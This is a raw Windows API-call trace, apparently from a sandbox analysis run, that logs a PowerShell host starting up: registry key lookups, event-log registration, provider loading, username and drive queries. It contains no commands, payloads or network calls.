	[0399.038] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.038] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x8, lpName=0x2f4ad0, lpcchName=0x16d558, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d558, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0399.038] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.038] CoTaskMemFree (pv=0x0) 
	[0399.038] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x31c) returned 0x0
	[0399.038] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0399.038] RegOpenKeyExW (in: hKey=0x358, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x35c) returned 0x0
	[0399.038] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0399.038] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x360) returned 0x0
	[0399.039] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0399.039] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x364) returned 0x0
	[0399.039] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0399.039] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x368) returned 0x0
	[0399.039] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0399.039] RegOpenKeyExW (in: hKey=0x358, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x36c) returned 0x0
	[0399.039] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0399.039] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x370) returned 0x0
	[0399.039] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0399.039] RegOpenKeyExW (in: hKey=0x358, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x374) returned 0x0
	[0399.039] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x0) returned 0x2
	[0399.039] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x378) returned 0x0
	[0399.040] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x37c) returned 0x0
	[0399.040] RegCloseKey (hKey=0x37c) returned 0x0
	[0399.040] RegCloseKey (hKey=0x358) returned 0x0
	[0399.040] RegCloseKey (hKey=0x378) returned 0x0
	[0399.045] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8c0008
	[0399.368] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2efbf88*="WSMan", lpRawData=0x2efbcf8) returned 1
	[0399.369] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0399.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.369] CoTaskMemFree (pv=0x34e250) 
	[0399.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.371] CoTaskMemAlloc (cb=0x804) returned 0x1b7f8350
	[0399.371] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f8350, nSize=0x16d848 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d848) returned 0x1
	[0399.372] CoTaskMemFree (pv=0x1b7f8350) 
	[0399.372] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.372] GetUserNameW (in: lpBuffer=0x2f4ad0, pcbBuffer=0x16d888 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d888) returned 1
	[0399.372] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.372] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f01968*="Alias", lpRawData=0x2f016f8) returned 1
	[0399.373] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0399.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.373] CoTaskMemFree (pv=0x34e250) 
	[0399.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.375] CoTaskMemAlloc (cb=0x804) returned 0x1b7f8350
	[0399.375] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f8350, nSize=0x16d848 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d848) returned 0x1
	[0399.375] CoTaskMemFree (pv=0x1b7f8350) 
	[0399.375] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.375] GetUserNameW (in: lpBuffer=0x2f4ad0, pcbBuffer=0x16d888 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d888) returned 1
	[0399.375] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.375] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f06f60*="Environment", lpRawData=0x2f06cf0) returned 1
	[0399.376] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0399.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.376] CoTaskMemFree (pv=0x34e250) 
	[0399.377] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0399.377] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0399.377] CoTaskMemFree (pv=0x34e250) 
	[0399.377] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0399.377] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0399.377] CoTaskMemFree (pv=0x34e250) 
	[0399.377] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0399.377] SetErrorMode (uMode=0x1) returned 0x1
	[0399.377] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d600 | out: lpFileInformation=0x16d600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0399.378] SetErrorMode (uMode=0x1) returned 0x1
	[0399.379] GetLogicalDrives () returned 0x4
	[0399.379] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0399.380] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0399.380] SetErrorMode (uMode=0x1) returned 0x1
	[0399.381] CoTaskMemAlloc (cb=0x68) returned 0x1b7c4dd0
	[0399.381] CoTaskMemAlloc (cb=0x68) returned 0x1b7c47b0
	[0399.381] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b7c4dd0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d5d0, lpMaximumComponentLength=0x16d5cc, lpFileSystemFlags=0x16d5c8, lpFileSystemNameBuffer=0x1b7c47b0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d5d0*=0x9c354b42, lpMaximumComponentLength=0x16d5cc*=0xff, lpFileSystemFlags=0x16d5c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0399.381] CoTaskMemFree (pv=0x1b7c4dd0) 
	[0399.381] CoTaskMemFree (pv=0x1b7c47b0) 
	[0399.381] SetErrorMode (uMode=0x1) returned 0x1
	[0399.381] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0399.381] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0399.381] SetErrorMode (uMode=0x1) returned 0x1
	[0399.382] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d570 | out: lpFileInformation=0x16d570*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0399.382] SetErrorMode (uMode=0x1) returned 0x1
	[0399.382] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0399.382] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0399.382] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0399.382] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0399.382] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0399.382] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0399.383] SetErrorMode (uMode=0x1) returned 0x1
	[0399.383] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d3a0 | out: lpFileInformation=0x16d3a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0399.383] SetErrorMode (uMode=0x1) returned 0x1
	[0399.383] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0399.383] SetErrorMode (uMode=0x1) returned 0x1
	[0399.383] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d3a0 | out: lpFileInformation=0x16d3a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0399.383] SetErrorMode (uMode=0x1) returned 0x1
	[0399.383] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0399.383] SetErrorMode (uMode=0x1) returned 0x1
	[0399.383] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0399.383] SetErrorMode (uMode=0x1) returned 0x1
	[0399.384] CoTaskMemAlloc (cb=0x804) returned 0x1b7f8350
	[0399.384] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f8350, nSize=0x16d848 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d848) returned 0x1
	[0399.384] CoTaskMemFree (pv=0x1b7f8350) 
	[0399.384] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.384] GetUserNameW (in: lpBuffer=0x2f4ad0, pcbBuffer=0x16d888 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d888) returned 1
	[0399.384] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.384] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f0e050*="FileSystem", lpRawData=0x2f0dde0) returned 1
	[0399.385] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0399.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.385] CoTaskMemFree (pv=0x34e250) 
	[0399.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.386] CoTaskMemAlloc (cb=0x804) returned 0x1b7f8350
	[0399.386] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f8350, nSize=0x16d848 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d848) returned 0x1
	[0399.386] CoTaskMemFree (pv=0x1b7f8350) 
	[0399.386] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.386] GetUserNameW (in: lpBuffer=0x2f4ad0, pcbBuffer=0x16d888 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d888) returned 1
	[0399.386] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.386] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f13890*="Function", lpRawData=0x2f13620) returned 1
	[0399.387] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0399.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.387] CoTaskMemFree (pv=0x34e250) 
	[0399.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.781] CoTaskMemAlloc (cb=0x804) returned 0x1b7f8350
	[0399.781] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f8350, nSize=0x16d848 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d848) returned 0x1
	[0399.781] CoTaskMemFree (pv=0x1b7f8350) 
	[0399.781] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0399.781] GetUserNameW (in: lpBuffer=0x2f4ad0, pcbBuffer=0x16d888 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d888) returned 1
	[0399.781] CoTaskMemFree (pv=0x2f4ad0) 
	[0399.782] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f360b8*="Registry", lpRawData=0x2f35e48) returned 1
	[0400.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0400.318] CoTaskMemAlloc (cb=0x804) returned 0x1b7f8350
	[0400.318] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f8350, nSize=0x16d848 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d848) returned 0x1
	[0400.318] CoTaskMemFree (pv=0x1b7f8350) 
	[0400.319] CoTaskMemAlloc (cb=0x204) returned 0x2f4ad0
	[0400.319] GetUserNameW (in: lpBuffer=0x2f4ad0, pcbBuffer=0x16d888 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d888) returned 1
	[0400.319] CoTaskMemFree (pv=0x2f4ad0) 
	[0400.319] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f3b4d0*="Variable", lpRawData=0x2f3b260) returned 1
	[0400.321] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0400.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.321] CoTaskMemFree (pv=0x34e250) 
	[0400.324] CoTaskMemAlloc (cb=0x104) returned 0x34e250
	[0400.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.324] CoTaskMemFree (pv=0x34e250) 
	[0400.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0400.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0400.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
